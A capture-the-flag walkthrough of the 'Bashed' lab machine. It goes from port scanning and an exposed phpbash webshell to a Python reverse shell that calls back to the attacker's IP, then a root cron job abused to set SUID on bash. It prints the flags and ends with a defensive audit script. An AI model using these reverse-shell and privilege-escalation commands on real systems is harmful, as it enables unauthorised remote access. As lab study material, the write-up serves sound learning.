Bashed

Scanning

sudo nmap -A -T4 -v 10.10.10.68 -oA scans/scan

Only HTTP (port 80) is open:

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Visiting the website:

phpbash? Reading through the article on the site, we are given a GitHub repo.

None of the menu items work, so let's enumerate some directories:

dirsearch -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r

Got some directories.

Viewing the GitHub repo, we see that phpbash is normally located in /uploads/.

Checking that directory: not that easy.

Let's check out the other directories we found.

Found nothing of interest until the /dev/ directory.

Is it this easy?

It really is this easy. We can access the user flag:
f26dfc3d5f1f90a96b1869ab0fe6e825

Can we get a revshell?

Try this Python one:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.25",42069));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

Pasted it into the webshell and hit enter.

Upgrade our shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Let's see if we can privesc.

We can run commands as the scriptmanager user? Let's jump to that user:

sudo -u scriptmanager /bin/bash

Can we get to root? Found the /scripts/ directory with three files:

scriptmanager@bashed:/scripts$ cat write.py
cat write.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")

write.py is spawning a reverse shell.

cat test.txt
testing 123!scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$

test.py is writing a file, but the file is written as root?

Are these being executed? Let's get pspy.

On our machine:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

Host an HTTP server:

python3 -m http.server 80

On the victim:

wget http://10.10.14.25/pspy64
chmod +x pspy64
./pspy64

It is being executed!

UID=0, so it's root:

/bin/sh -c cd /scripts; for f in *.py; do python "$f"; done

This means it executes ANY .py script in that directory as root. Let's see if we can just write one that adds SUID to bash:

import os

os.system("sudo chmod +s /bin/bash")
wget it onto the box and wait.

Looks like it executed.

Now all we have to do is:

bash -p

That's root!

1c476338bc925ceff2eb36cf72fc5c23
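The root cause of this box is a root cron job that runs every *.py in a directory owned and writable by scriptmanager rather than root. As an added defender's check, not part of the original writeup, the script below audits such a directory and flags the conditions that made this privesc work; the /scripts path and uid 0 come from the cron line above, the function names are my own.

```python
import glob
import os
import stat

# Constructed example, not code from the writeup. A root cron job runs
#   cd /scripts; for f in *.py; do python "$f"; done
# so anyone who can write a .py into that directory gets code run as root.
# This audit flags the conditions that make such a loop dangerous.


def files_cron_would_run(script_dir):
    """Return the *.py files the cron loop would pick up, in sorted order."""
    return sorted(glob.glob(os.path.join(script_dir, "*.py")))


def _writable_by_others(mode):
    """True if the group or world write bit is set."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_script_dir(script_dir, trusted_uid=0):
    """Return a list of (path, reason) findings for a root-run script directory.

    trusted_uid is the only owner allowed to write here (root by default).
    The directory itself is checked first: if anyone else can write to it,
    the individual files do not matter, since a new *.py can just be dropped in.
    """
    findings = []
    d = os.stat(script_dir)
    if d.st_uid != trusted_uid:
        findings.append((script_dir, "directory owned by uid %d, not %d" % (d.st_uid, trusted_uid)))
    if _writable_by_others(d.st_mode):
        findings.append((script_dir, "directory writable by group/other (mode %o)" % stat.S_IMODE(d.st_mode)))

    for path in files_cron_would_run(script_dir):
        st = os.lstat(path)  # lstat: a symlink could point anywhere
        if stat.S_ISLNK(st.st_mode):
            findings.append((path, "symlink, target can be swapped"))
            continue
        if st.st_uid != trusted_uid:
            findings.append((path, "owned by uid %d, not %d" % (st.st_uid, trusted_uid)))
        if _writable_by_others(st.st_mode):
            findings.append((path, "writable by group/other (mode %o)" % stat.S_IMODE(st.st_mode)))
    return findings


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/scripts"
    for path, reason in audit_script_dir(target):
        print("%s: %s" % (path, reason))
```

An empty result means root is the only owner and nobody else can write the directory or any script in it; on this box the audit would flag /scripts itself as owned by scriptmanager.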